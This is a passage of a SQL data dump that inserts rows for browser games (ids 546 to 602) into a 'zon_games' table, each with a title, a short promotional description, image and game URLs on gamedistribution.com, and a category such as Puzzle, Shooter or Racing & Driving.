(546, 'Ice Cream Jigsaw', 'What is the favorite food of summer days? Of course, ice cream prepared with great sauces. There are many ice creams that you will like in this puzzle game created with great graphics. How would you like to eat your ice cream? There are 12 different puzzles and 12 different ice creams in this game for you. Let\'s put all the pieces together.', 'https://img.gamedistribution.com/c46cba7824ba49bcb88580fd7fa70c87-512x384.jpeg', 'https://html5.gamedistribution.com/c46cba7824ba49bcb88580fd7fa70c87/', '0', 'Puzzle', 0, 0, '', 0, ''),
(547, 'Euro Truck Simulator Cargo Truck Drive', 'Euro Truck Driver lets you become a real trucker! Featuring European trucks with lots of customizations, this truck simulator delivers an exciting driving experience that will make you feel like driving real trucks. Travel across many countries from Europe, visit incredible places like Berlin, Prague, Madrid, Rome, Paris and more! Play the career mode of this truck simulator, make money, purchase new trucks and upgrades, explore the trucking world! Challenge your friends with the online multiplayer mode, show off your customized truck! Become the King of The Road by playing Euro Truck Driver!\n', 'https://img.gamedistribution.com/a64bd68900e641678aed8b1470f7eca9-512x384.jpeg', 'https://html5.gamedistribution.com/a64bd68900e641678aed8b1470f7eca9/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(548, 'The Survivor', 'The Survivor is shooting game and you are one from few survivors after apocalypse. So you need to shoot the zombies and other creatures who want to destroy you. They will came in waves, so between every level it is better to buy and upgrade your weapon and ammo. Destroy your enemies and enjoy in this game. ', 'https://img.gamedistribution.com/52506843c8a748c2befcce2d80b20fe8-512x384.jpeg', 'https://html5.gamedistribution.com/52506843c8a748c2befcce2d80b20fe8/', '0', 'Shooter', 0, 0, '', 0, ''),
(549, 'Mr Jack vs Zombies', 'Mr Jack vs Zombies is a fun puzzle and shooter game. This game has the best physics shooter game there is. Play Mr Jack vs Zombies now to have a great time! ', 'https://img.gamedistribution.com/63ce1671d78045f580da1346b906edca-512x512.jpeg', 'https://html5.gamedistribution.com/63ce1671d78045f580da1346b906edca/', '0', 'Shooter', 0, 0, '', 0, ''),
(550, 'Solitaire TriPeaks Garden', 'In Solitaire TriPeaks Garden you can play hundreds of levels filled with the most addictive version of solitaire there is! And you can do that along with your trusty cat companion that shall help you along the journey of filling your greenhouses with the most beautiful flowers of all colors! Playful and relaxed experience awaits!\n', 'https://img.gamedistribution.com/8b8cc237e7c947b1a8400335a1829a48-512x340.jpeg', 'https://html5.gamedistribution.com/8b8cc237e7c947b1a8400335a1829a48/', '0', 'Cards', 0, 0, 'https://img.gamedistribution.com/8b8cc237e7c947b1a8400335a1829a48-512x384.jpeg', 0, ''),
(551, 'Truck Drift', 'Truck Drift is game where you need to do some drifts with your truck. On the start you can choose the speed that truck will drive. Our recommendation is to start with given speed of 90 mph and if you want you can increase the speed later in the game. Try to pass more circles in stage as you can before crash. ', 'https://img.gamedistribution.com/5533fa4324fe46a0973f35dbf4cf2801-512x384.jpeg', 'https://html5.gamedistribution.com/5533fa4324fe46a0973f35dbf4cf2801/', '0', 'Puzzle', 0, 0, '', 0, ''),
(552, 'Hidden Cute Animals', 'Can you find all cute animals hidden on the image? Beware, many of them look similar, and you have limited time. Try to get maximum number of stars on each of 16 levels.', 'https://img.gamedistribution.com/fa0f77253b1047139bc760740ba632ee-1280x720.jpeg', 'https://html5.gamedistribution.com/fa0f77253b1047139bc760740ba632ee/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/fa0f77253b1047139bc760740ba632ee-512x340.jpeg', 0, ''),
(553, 'Mineblock Adventure', 'Mineblock Adventure is fun running and jumping game suitable for all ages. Run and jump with Steve, the online game legend. Collect money and avoid enemies on the way to the finish line. Our lovley Steve is back in an action-packed jumping and running game! Have fun as you relive the Steve, online game legend. Run, jump, dash across the road and through exciting platformer levels. Start playing and have fun. ', 'https://img.gamedistribution.com/1bb623b6f3d946288e3ba8eff540c38d-512x384.jpeg', 'https://html5.gamedistribution.com/1bb623b6f3d946288e3ba8eff540c38d/', '0', 'Adventure', 0, 0, '', 0, ''),
(554, 'Sudoku Classic', '\"Sudoku Classic\" is a timeless puzzle game played on a 9x9 grid. The objective is to fill every row, column, and 3x3 square with the numbers 1-9, ensuring that no number is repeated within the same row, column, or square. LofGames has designed an easy-to-use interface and added various features to enhance your experience while enjoying this classic Sudoku game.', 'https://img.gamedistribution.com/cbb50b90ed904252849de31f7647a0e7-512x384.jpeg', 'https://html5.gamedistribution.com/cbb50b90ed904252849de31f7647a0e7/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/cbb50b90ed904252849de31f7647a0e7-1280x550.jpeg', 0, ''),
(555, 'Hidden Objects Insects', '\"Hidden Objects Insects\" brings you a classic point-and-click hidden object game. Your task is to scour the screen and locate all the items listed on the left side of the picture. Be swift in your search because you must complete the level before time runs out to earn valuable bonus points. Dive into this enthralling insect-themed challenge and put your observation skills to the test!', 'https://img.gamedistribution.com/8738f7863f7846dba487ffd461394bb7-512x384.jpeg', 'https://html5.gamedistribution.com/8738f7863f7846dba487ffd461394bb7/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/8738f7863f7846dba487ffd461394bb7-1280x550.jpeg', 0, ''),
(556, 'Ping Pong Ball', 'Ply ping pong ball game and collect the coins and score. ball speed increase incrementally.\nYou can touch on the screen or use keyboard up and down arrow keys or up and down on game pad to move the stick.\nEnjoy!', 'https://img.gamedistribution.com/c35fc1ad1b2c42379ef502b880f788fd-512x512.jpeg', 'https://html5.gamedistribution.com/c35fc1ad1b2c42379ef502b880f788fd/', '0', 'Agility', 0, 0, 'https://img.gamedistribution.com/c35fc1ad1b2c42379ef502b880f788fd-1280x550.jpeg', 0, ''),
(557, 'Tenkyu Hole 3d rolling ball', 'Roll the ball through a 3D world to reach the goal! \nCarefully maneuver through stages, or meet your doom!.Swipe your finger and tilt the stage and roll the ball. \nBe careful not to tilt too much! Game over if the ball falls!', 'https://img.gamedistribution.com/1e5a7fd7971e404d913438baf20e85df-512x384.jpeg', 'https://html5.gamedistribution.com/1e5a7fd7971e404d913438baf20e85df/', '0', 'Casual', 0, 0, '', 0, ''),
(558, 'Real Car Parking Jigsaw ', 'The iconic Parking Mania is back with a new challenge for attention, wariness, and sense of space!  \nDon\'t stop and you won\'t notice how you become a real ace of driving and parking!  \nIn a huge city, there is less and less room for your car!  \n  \nFeatures:  \n- Easy to learn and addictive gameplay  \n- Many levels for honing your parking skills!  \n- 80+ cars including taxi, sports cars, trucks, and even the ambulance!  \n- Three kinds of control at any taste  \n  \nKeep calm and fasten your seat belts!', 'https://img.gamedistribution.com/69d842e343d14513961476c5baea0634-512x512.jpeg', 'https://html5.gamedistribution.com/69d842e343d14513961476c5baea0634/', '0', 'Adventure', 0, 0, '', 0, ''),
(559, 'Face Paint Salon', 'Design your own cool, funny, cute, and chic face doodles with this amazing face painting app! Girls can create their own funny party designs from scratch, then paint pictures using a variety of themes. It\'s the perfect way for girls to practice their chic doodling skills without all the mess!', 'https://img.gamedistribution.com/29fa6316a8b0446799b1bba308f7592b-512x384.jpeg', 'https://html5.gamedistribution.com/29fa6316a8b0446799b1bba308f7592b/', '0', 'Dress-up', 0, 0, '', 0, ''),
(560, 'Protect the Earth', 'Our blue planet Earth is constantly becoming subject to bombard various celestial bodies, arriving from space, but recently it began to happen more often than usual, and so was put into orbit a rocket capable of protecting the earth\'s atmosphere from invading. Help her cope with the pressure of meteorites, asteroids and other intruders, shooting them on approaching the Earth. Collect bonuses and secures protection and powerful new weapons.', 'https://img.gamedistribution.com/58837f55b5f04759b6d5480a61f362e3-512x512.jpeg', 'https://html5.gamedistribution.com/58837f55b5f04759b6d5480a61f362e3/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/58837f55b5f04759b6d5480a61f362e3-1280x550.jpeg', 0, ''),
(561, 'Cute Girl Coloring Book', 'Cute Girl Coloring Book is online coloring game suitable for all ages. Cute Girl known as Dora The Explorer is one of the most recognizable cartoon characters today. In this game choose one of the images and make a master piece. Let your imagination flow. When done print the image and show it to your friends and parents. Have fun coloring.', 'https://img.gamedistribution.com/5265c12b95a546a0b2283df8a16511c1-512x384.jpeg', 'https://html5.gamedistribution.com/5265c12b95a546a0b2283df8a16511c1/', '0', 'Art', 0, 0, '', 0, ''),
(562, 'City Race Destruction', 'City Race Destruction is a survival race in a city full of obstacles! Find special signs on the streets of the city to participate in insane survival races on the narrow streets of a small city. Collect coins, win races and get large sums to buy even faster and armored vehicles that will easily destroy any opponent!', 'https://img.gamedistribution.com/a5947ee11b0e4288b78315c698c55c37-512x384.jpeg', 'https://html5.gamedistribution.com/a5947ee11b0e4288b78315c698c55c37/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(563, 'Move Balloon Safely ', 'Moves balloon left and right and let it go to top or end without colliding wooden spikes.\nThis game is fun to play and try to complete the level.\nEnjoy! ', 'https://img.gamedistribution.com/47fb56258800475fb5251947631d13d3-512x384.jpeg', 'https://html5.gamedistribution.com/47fb56258800475fb5251947631d13d3/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/47fb56258800475fb5251947631d13d3-1280x550.jpeg', 0, ''),
(564, 'Baby Taylor Fairy Land Dream', 'Taylor suddenly finds out she is in a Fairy Land. But the world isn’t look beautiful. Taylor meet a princess, tell her that the world was destroyed by a bad witch. The only way to rebuild the world is to find all the magic materials. Taylor decides to protect the world with her brave heart. It’s a tough road. Please help her!', 'https://img.gamedistribution.com/3c7e852f7b5a4795a00b66a676b0f73d-512x384.jpeg', 'https://html5.gamedistribution.com/3c7e852f7b5a4795a00b66a676b0f73d/', '0', 'Care', 0, 0, '', 0, ''),
(565, 'Racing Cars Jigsaw Challenge', 'Racing Cars Jigsaw Challenge is a online game that you can play for free. Racing Cars Jigsaw Challenge is from the genre of puzzle and jigsaw games. Do you like Racing Cars? Let\'s try this nice jigsaw game about it! There are 12 images for you to choose from. Your mission is to drag the pieces to its original position. The game has no time limitation. Just play it for free.\n.Have fun playing and come back for more free games.', 'https://img.gamedistribution.com/0fb235a397184c6690aafef1d5588aa3-512x384.jpeg', 'https://html5.gamedistribution.com/0fb235a397184c6690aafef1d5588aa3/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(566, 'Super Jewel Collapse', '\"Super Jewel Collapse\" is a captivating block collapse game that presents a unique challenge in each level. Your objective is to conquer each challenge within the allowed number of turns. The more efficiently you do so, the higher your bonus points will be. With a total of 45 levels to complete, can you rise to the challenge and emerge victorious in this jewel-themed puzzle adventure?', 'https://img.gamedistribution.com/cfdf7e12a7824cd8b9aea2e942c9f40f-512x384.jpeg', 'https://html5.gamedistribution.com/cfdf7e12a7824cd8b9aea2e942c9f40f/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/cfdf7e12a7824cd8b9aea2e942c9f40f-1280x550.jpeg', 0, ''),
(567, 'Run Race 3D', 'From folks who brought you Run Race 3D.\n Experience full parkour experience with hundreds of unique levels.\nRace with others, achieve levels , unlock new characters. \nEvery level brings a new unique fun experience. Very easy to play.\nHold to run, release to stop. \nDo you have what it takes to reach to end?', 'https://img.gamedistribution.com/a0b924940785449cb4a075e2d5f025a3-512x384.jpeg', 'https://html5.gamedistribution.com/a0b924940785449cb4a075e2d5f025a3/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(568, 'Chameleon Want Eat', 'Feed the Chameleon with different insects. The Chameleon will change the color and that is the easiest way to eat insects with the same color. Tap on the screen to rotate the Chameleon and to eat insects.', 'https://img.gamedistribution.com/1c1a5f2c09b34ec69ef31dc30497f3c2-512x384.jpeg', 'https://html5.gamedistribution.com/1c1a5f2c09b34ec69ef31dc30497f3c2/', '0', 'Puzzle', 0, 0, '', 0, ''),
(569, 'Mermaid Princess Adventure', 'This is the story of the fairy tale - The Little Mermaid. Ariel who lives in the sea saves a drowning prince one day. She loves him at first sight. But she is not a human. She drinks a magic potion to have legs. Follow Ariel to have this adventure. Make she becomes a beautiful girl to attract the prince.', 'https://img.gamedistribution.com/8614d18fc7704fdb8ce7a96ea92f277a-512x384.jpeg', 'https://html5.gamedistribution.com/8614d18fc7704fdb8ce7a96ea92f277a/', '0', 'Adventure', 0, 0, '', 0, ''),
(570, 'Piano Tiles 3', 'Play along to the beat in this fun piano tiles game. Do not miss any tiles or it is game over. Keep tapping along until you complete all of the songs.', 'https://img.gamedistribution.com/01916e94606344f5b0620fd8e76d2127-512x384.jpeg', 'https://html5.gamedistribution.com/01916e94606344f5b0620fd8e76d2127/', '0', 'Agility', 0, 0, '', 0, ''),
(571, 'Little Princess Jigsaw', 'Beautiful princesses came together for you in this game. They are eagerly waiting for you to put the pieces together and complete the pictures. If you get confused there is a magic button find it and click it, all the pieces will come together and your job will be easier. Let\'s explore together in this game, the graceful princess dressed in 12 wonderful dresses.', 'https://img.gamedistribution.com/e80dcdd17179412b93904ecefca158d7-512x384.jpeg', 'https://html5.gamedistribution.com/e80dcdd17179412b93904ecefca158d7/', '0', 'Puzzle', 0, 0, '', 0, ''),
(572, 'Kids Superheroes Memory', 'Kids Superheroes Memory is a free online game from genre of memory and monsters truck games. Flip the tiles and try to match them up in pairs. Pair up all the tiles to win. Try to complete the game in as few moves as possible! There are is 4 levels. Use mouse to click or tap to screen on the squares. Concentrate yourself and start to play. Enjoy!', 'https://img.gamedistribution.com/6e442d0f84144f5489203e7a148dbaee-512x384.jpeg', 'https://html5.gamedistribution.com/6e442d0f84144f5489203e7a148dbaee/', '0', 'Puzzle', 0, 0, '', 0, ''),
(573, 'Press the Longest Stick', 'This game\'s rule is very simple, find out the longest stick and click (tap) it.The game has time limit so you need to find the target stick fast and correct. There are 2 difficulty in the game, normal mode and hard mode, the time limit of normal mode is longer than hard mode. If you think you are very good at this game, let\'s challenge hard mode! And there are many interesting titles you can get. ', 'https://img.gamedistribution.com/ab9ee806ce3a44198d87ffb5587184f4-512x384.jpeg', 'https://html5.gamedistribution.com/ab9ee806ce3a44198d87ffb5587184f4/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/ab9ee806ce3a44198d87ffb5587184f4-1280x550.jpeg', 0, ''),
(574, 'Tie Dye', 'What style of shirts, skirts, etc do you like? You can dye it whatever you like. There are many styles of clothes waiting for you to tie-dye. You can also dye according to the tips.  Sell them! ', 'https://img.gamedistribution.com/3f0e56645c5042abb995ebc3677ff418-512x384.jpeg', 'https://html5.gamedistribution.com/3f0e56645c5042abb995ebc3677ff418/', '0', 'Art', 0, 0, '', 0, ''),
(575, 'Quick Dice', 'Quick Dice is fun board game to play. In front of your screen, a playing field will appear with various visible colored dots. Your opponents in this game are few. The moves in the game are done in order of priority. First you need to roll special dice and certain numbers will fall on them. Number mean how many moves you will need to make. Then, you will pass along the game map and light a specific point. Your goal is to fill most of the playing field with dots of your color.So heave fun!', 'https://img.gamedistribution.com/af51560c00d0469f95a11dbe69de9d86-512x384.jpeg', 'https://html5.gamedistribution.com/af51560c00d0469f95a11dbe69de9d86/', '0', 'Puzzle', 0, 0, '', 0, ''),
(576, 'Flying Robot', 'MOVE THE ROBOT WITH TOUCHING LEFT AND RIGHT BUTTONS OR KEYBOARD LEFT AND RIGHT ARROWS OR GAME PAD (SHOULDER BUTTONS).\n\nYOU CAN NOT USE TWO BUTTONS AT SAME TIME.\n\nAND FIND THE SHIP TO END THE GAME.', 'https://img.gamedistribution.com/bba71d05acdb4704aad2a00c07ce4713-512x384.jpeg', 'https://html5.gamedistribution.com/bba71d05acdb4704aad2a00c07ce4713/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/bba71d05acdb4704aad2a00c07ce4713-1280x720.jpeg', 0, ''),
(577, 'Blocks Up', 'Blocks Up is a fun online puzzle game. Match 3 blocks of the same color. Don’t let the blocks reach the dotted line! Have fun and enjoy with Blocks Up game.', 'https://img.gamedistribution.com/576782ea7beb4e93a24adcbd649d40dc-512x384.jpeg', 'https://html5.gamedistribution.com/576782ea7beb4e93a24adcbd649d40dc/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/576782ea7beb4e93a24adcbd649d40dc-1280x550.jpeg', 0, ''),
(578, 'Animal Firetrucks Match 3', 'Animal Firetrucks Match 3 – this cool game three in a row, in which you have to put the blocks of the same color in a series of three pieces or more to achieve the highest possible score, be careful to account the scale to the left did not fall too low, otherwise the game will be over. Enjoy the game!', 'https://img.gamedistribution.com/d6dbd5942a8c40b7911d7a40bdc02314-512x384.jpeg', 'https://html5.gamedistribution.com/d6dbd5942a8c40b7911d7a40bdc02314/', '0', 'Match-3', 0, 0, '', 0, ''),
(579, 'Flying Police Car Simulator', 'Flying Police Car Simulator is a 3d game with unique gameplay and map of the Police city. There are huge skyscrapers, which you have to avoid while flying Police Car through them. Once you have collided with them, you’ll lose your speed and fell to the ground. Fly to the airport of the Police City that is not connected to the Police city via main roads. \nYou can drive and fly through the city and explore what’s hidden inside the city. Fly high & drive as fast as you can, jump off the skyscrapers and earn coins. Unlock more cars by collecting coins scattered around the city. \nAvoid falling in the water, or you’ll lose your progress. Also, there’s a hidden island on the map you just have to fly through it. Hurry up! Before the fuel runs out.', 'https://img.gamedistribution.com/cad7383a94b64843bda6a74415c98d2f-512x384.jpeg', 'https://html5.gamedistribution.com/cad7383a94b64843bda6a74415c98d2f/', '0', 'Simulation', 0, 0, 'https://img.gamedistribution.com/cad7383a94b64843bda6a74415c98d2f-1280x550.jpeg', 0, ''),
(580, 'Alex The Alien', 'Alex the alien is lost on a strange planet! Help him collect coins and open the portal to get to the next level. Travel through 50 levels spread over 3 unique worlds and get back to your spaceship.', 'https://img.gamedistribution.com/f33665f5d8834eb88d0d10518d69f5de-512x512.jpeg', 'https://html5.gamedistribution.com/f33665f5d8834eb88d0d10518d69f5de/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/f33665f5d8834eb88d0d10518d69f5de-512x384.jpeg', 0, ''),
(581, 'Endless Car Chase', 'Multiple Super Cars, Dodge police cars and earn cash, upgrade your rides and many more. It is a great casual driving game with blocky police chase.', 'https://img.gamedistribution.com/adfd3892e88d4fdc981719b11fd4c761-512x384.jpeg', 'https://html5.gamedistribution.com/adfd3892e88d4fdc981719b11fd4c761/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(582, 'Slenderman Horror Story MadHouse', 'After you escaped from Slender-man in your house, you lost your sanity. The asylum is you home now.\nBut did you really get away from Him ? Is It real or it\'s just in your head ?\nYou are about to find out in this thrilling horror adventure.\nSolve the puzzles and fight scary mental patients while you trying to leave the madhouse.', 'https://img.gamedistribution.com/0a2e8d73a9d1473c9195b6bd3a8829b1-512x384.jpeg', 'https://html5.gamedistribution.com/0a2e8d73a9d1473c9195b6bd3a8829b1/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/0a2e8d73a9d1473c9195b6bd3a8829b1-1280x720.jpeg', 0, ''),
(583, '2048 Drop', 'This is a game based on 2048 game and drop game. The tiles with number will drop from the top.When tiles of the same number collide with eachother, they will combine into one tile carrying the sum of two tiles.If the broad is filled and no place for a new title, game over. This a game need player\'s reaction capacity, operational capability and placement capacity. The rule of 2048 and drop game are very simple, but the mix of them is not easy.Let\'s try the game and get as more score as you can.', 'https://img.gamedistribution.com/efec93704a6d4f9e83fd78536231192c-512x384.jpeg', 'https://html5.gamedistribution.com/efec93704a6d4f9e83fd78536231192c/', '0', 'Match-3', 0, 0, 'https://img.gamedistribution.com/efec93704a6d4f9e83fd78536231192c-1280x550.jpeg', 0, ''),
(584, 'Combat Strike Zombie Survival Multiplayer', 'Combat Strike Zombie Survival Multiplayer totally free to bet much enemy AI like soldier and realistic zombie pixel, 5 game settings like gun video game, survival, TDM, DM, lock all gun by rank, buy characters with XP multiplayer have fun with close friends and also offline with 40 levels. Enjoy right here.', 'https://img.gamedistribution.com/ff3040ca58e24188bd91baa6a2904d00-512x384.jpeg', 'https://html5.gamedistribution.com/ff3040ca58e24188bd91baa6a2904d00/', '0', 'Battle', 0, 0, '', 0, ''),
(585, 'Miami Traffic Racer', 'Miami Traffic Racer is an driving game! Drive a sports car on the highway of the city of Miami, pass checkpoints for a while, collect coins, wads of money, fuel and boost lines. One big yellow sports car game keeps you on your toes in this addicting driving game.', 'https://img.gamedistribution.com/df764c259a7048d79e276167e4721c22-512x384.jpeg', 'https://html5.gamedistribution.com/df764c259a7048d79e276167e4721c22/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/df764c259a7048d79e276167e4721c22-1280x550.jpeg', 0, ''),
(586, 'Mahjong Connect Deluxe', '\"Mahjong Connect Deluxe\" is a classic puzzle game inspired by the renowned Chinese tile removal game, Mahjong. Your task is to eliminate all the tiles on the board by connecting identical tiles to remove them. However, each connection can\'t involve more than 2 turns. With 18 challenging levels to conquer, your objective is to finish each level before time runs out to earn extra bonus points. Dive into this tile-matching adventure and test your skills!', 'https://img.gamedistribution.com/c08847333a0e4465a6226b0b1894d7b7-512x384.jpeg', 'https://html5.gamedistribution.com/c08847333a0e4465a6226b0b1894d7b7/', '0', 'Mahjong & Connect', 0, 0, 'https://img.gamedistribution.com/c08847333a0e4465a6226b0b1894d7b7-1280x550.jpeg', 0, ''),
(587, 'Little Animals Coloring', 'What can you do if we give you a magic brush and a magic paint? Do you trust your abilities? Cute animals are waiting for you to add color to their lives, don\'t make them wait any longer, click now to start the adventure!', 'https://img.gamedistribution.com/8cb6416b41494b2082349350c6340154-512x384.jpeg', 'https://html5.gamedistribution.com/8cb6416b41494b2082349350c6340154/', '0', 'Art', 0, 0, '', 0, ''),
(588, ' Real Doctor Robot Animal Rescue', 'Real Doctor Robot Animal Rescue and Animals doctor game 2020 is of unusual nature among all the Ambulance Rescue Game or rescue robot monitoring system game with the blend of Animals Rescue Game Doctor Robot 3D games due to its different challenges in Doctor Rescue Mission Game and Animal Rescue game offline free 3d real mission.', 'https://img.gamedistribution.com/cb65f8bdb8604b0a9acae43e5618c6f4-512x384.jpeg', 'https://html5.gamedistribution.com/cb65f8bdb8604b0a9acae43e5618c6f4/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/cb65f8bdb8604b0a9acae43e5618c6f4-1280x550.jpeg', 0, ''),
(589, 'Super Summer Style', 'Cool summer, it is time for girls to show their perfect style, beautiful girls all want to give themselves some different shapes in this summer to show the taste of summer, let\'s dress up for this beautiful girl!', 'https://img.gamedistribution.com/88af4a9ac61a42a4ba9c0e20db0aa7b6-512x384.jpeg', 'https://html5.gamedistribution.com/88af4a9ac61a42a4ba9c0e20db0aa7b6/', '0', 'Dress-up', 0, 0, 'https://img.gamedistribution.com/88af4a9ac61a42a4ba9c0e20db0aa7b6-1280x550.jpeg', 0, ''),
(590, 'Jungle Jigsaw Puzzle', 'Complete the puzzle by building the jigsaw puzzle image using parts. When completed the one puzzle then you have to complete the next one.\nThis is jungle puzzle game. Drag and drop the puzzle parts in to correct position.\nEnjoy!', 'https://img.gamedistribution.com/febab2b5c65f45bfbb19eec9a12fd23b-512x384.jpeg', 'https://html5.gamedistribution.com/febab2b5c65f45bfbb19eec9a12fd23b/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/febab2b5c65f45bfbb19eec9a12fd23b-1280x550.jpeg', 0, ''),
(591, 'Love Proposal Coloring', 'Choose the romantic colors to this love proposals property and give to your lovable one. Have a great fun!,Check the most liked love proposal items and give you favourite colors....', 'https://img.gamedistribution.com/f5e4d442d30746feb295406e2dc08b70-512x384.jpeg', 'https://html5.gamedistribution.com/f5e4d442d30746feb295406e2dc08b70/', '0', 'Art', 0, 0, '', 0, ''),
(592, 'Spot The Difference City', '\"Spot The Difference City\" is a captivating twist on the classic spot the difference puzzle game. Your mission is to discover at least 5 differences between two seemingly identical cityscape images. If you find yourself stuck, hints are available to assist you. Sharpen your observational skills and use your mouse or touchpad to tap on the differences you spot. Can you uncover all the distinctions and conquer the city\'s mysteries? Play now to find out!', 'https://img.gamedistribution.com/ba7363bb8dca43bea80181a84dc3c989-512x384.jpeg', 'https://html5.gamedistribution.com/ba7363bb8dca43bea80181a84dc3c989/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/ba7363bb8dca43bea80181a84dc3c989-1280x550.jpeg', 0, ''),
(593, 'What Is Wrong 2', '\n\"What is Wrong\" is an engaging photo observation game that challenges your logical skills. In each of the 12 levels, your task is to identify the one thing in the picture that logically shouldn\'t be there. Can you spot and correctly point out each wrong item to emerge victorious in this exciting game of observation and logic? Give it a try now!', 'https://img.gamedistribution.com/5729a84634ff44b793e230ec28df1350-512x384.jpeg', 'https://html5.gamedistribution.com/5729a84634ff44b793e230ec28df1350/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/5729a84634ff44b793e230ec28df1350-1280x550.jpeg', 0, ''),
(594, 'Easy Kids Coloring Mineblox', 'Easy Kids Coloring Mineblox is fun online game suitable for all ages. You can play it direct in your browser or your mobile device. Do you like coloring books and creative play, but you can not break away from resource extraction in Mineblox game? Nothing could be easier! This online coloring makes you distracted for a while. Ready for a great new adventure in Easy Kids Coloring Mineblox? Now, you have the chance to create your unique word. Have fun playing and come back for more. ', 'https://img.gamedistribution.com/a1680c7ef6264b248441b4472132ddc6-512x384.jpeg', 'https://html5.gamedistribution.com/a1680c7ef6264b248441b4472132ddc6/', '0', 'Art', 0, 0, '', 0, ''),
(595, 'Sweet Donut Maker Bakery', 'Donuts are delicious at eating but they are excitingly amazing at making. Try sweet delicious donut making for yourself to enjoy kitchen baking and cooking to become the best and delicious donut maker.\n\nDonut making will interact you with the shopping of sweet donut ingredients at the supermarket. Cook with fun and enjoyment in your kitchen bakery and become the best sweet yummy donut maker.\n\nBring donut ingredients to the cash counter of the store and the ingredients to your home kitchen bakery to relieve your hunger and be the best sweet donut maker and sweet dessert chef.\n\nFor the sweet dessert donut making, take donut ingredients to the kitchen and mix the ingredients for tasty donut making.\n\nCreate the round shape for your tasty donut to enjoy. Take the donut to frying pan and make donut fries at some warm temperature at your kitchen bakery to make it eatable by the crazy donut maker.\n\nAnd at the end decorate your donut with millions of sweets and delicious toppings.', 'https://img.gamedistribution.com/5e457db7763947de97286580fa9bcd25-512x384.jpeg', 'https://html5.gamedistribution.com/5e457db7763947de97286580fa9bcd25/', '0', 'Cooking', 0, 0, 'https://img.gamedistribution.com/5e457db7763947de97286580fa9bcd25-1280x550.jpeg', 0, ''),
(596, 'Head Sport Basketball', 'Head Sport Basketball is a fun basketball game with amazing graphics and challenging AI opponents. \nDo your best to earn scores against your opponents and win the matches!', 'https://img.gamedistribution.com/d02c1e6b99b2430aa35dcfff4d42bd63-512x384.jpeg', 'https://html5.gamedistribution.com/d02c1e6b99b2430aa35dcfff4d42bd63/', '0', 'Basketball', 0, 0, '', 0, ''),
(597, 'Princess Happy Tea Party Cooking', 'Elsa misses her friends, so she decides to hold a garden tea party and invites her friends to attend. She wants to make some delicious cupcakes and nice fruit platter for her friends to taste. Can you help Elsa make these delicious foods? Attending the tea party is not without good-looking clothing and accessories. After making the food, please help Elsa to match the beautiful clothes.', 'https://img.gamedistribution.com/301bf00b0fcf47b983af11deeaa962c6-512x384.jpeg', 'https://html5.gamedistribution.com/301bf00b0fcf47b983af11deeaa962c6/', '0', 'Cooking', 0, 0, '', 0, ''),
(598, 'Funny Bunnies Coloring', 'Funny Bunnies Coloring is a free online coloring and kids game! In this game you will find eight different pictures which have to be colored as fast as you can to obtain a great score at the end of the game. You have 23 different colors to choose. You can also save the colored image. Have fun!', 'https://img.gamedistribution.com/0af03f1c030542ff965c43980e63389a-512x384.jpeg', 'https://html5.gamedistribution.com/0af03f1c030542ff965c43980e63389a/', '0', 'Art', 0, 0, '', 0, ''),
(599, 'Stunt Crasher', 'Stunt Crasher is a fun game where you can jump off the ramp and hit the obstacles on your path. More destruction brings more score. Buy new vehicles, upgrade them and get ready for the next stage! ', 'https://img.gamedistribution.com/34e4a2045731457ba54de3e47e1aaa77-512x384.jpeg', 'https://html5.gamedistribution.com/34e4a2045731457ba54de3e47e1aaa77/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(600, 'Racing Motorcycles Memory', 'Racing Motorcycles Memory is puzzle game from genre of memory games. Test your memory. You will see the motorbike cards every few seconds, then they will spin and you need to find two identical cards by your memory fastest as you can. This game have five levels and every time you will have little time to do that. ', 'https://img.gamedistribution.com/3ae6fcff4952427ba9560ce630b25cc3-512x384.jpeg', 'https://html5.gamedistribution.com/3ae6fcff4952427ba9560ce630b25cc3/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(601, 'Time To Park 2', 'Drive a car and complete various parking missions. Park the car in the shortest time to earn more score points and get three stars. Avoid driving off the road or hitting other vehicles.', 'https://img.gamedistribution.com/ea500b90baa645d09f4b5d7a333b4001-512x384.jpeg', 'https://html5.gamedistribution.com/ea500b90baa645d09f4b5d7a333b4001/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/ea500b90baa645d09f4b5d7a333b4001-1280x550.jpeg', 0, '');
INSERT INTO `zon_games` (`id`, `game_name`, `game_description`, `game_image_url`, `game_url`, `game_published`, `game_category`, `game_status`, `game_played`, `game_banner_url`, `is_featured`, `game_card_size`) VALUES
(602, 'Math Boxing Comparison', 'This isn\'t your dad\'s punching bag as the bag punches back if you don\'t compare numbers correctly or take too much time.  If the bag lands a punch then you lose a life and you\'re that much closer to getting knocked out!  Simple to play just look at both numbers and tap on the correct sign:  \"<\", \">\" or \"=\".  As you box more you\'ll have less time to throw punches before the bag punches back and the numbers get larger!', 'https://img.gamedistribution.com/fdbc6168a4c94b7595c96e49c4dd62b5-512x384.jpeg', 'https://html5.gamedistribution.com/fdbc6168a4c94b7595c96e49c4dd62b5/', '0', 'Educational', 0, 0, 'https://img.gamedistribution.com/fdbc6168a4c94b7595c96e49c4dd62b5-1280x550.jpeg', 0, ''),
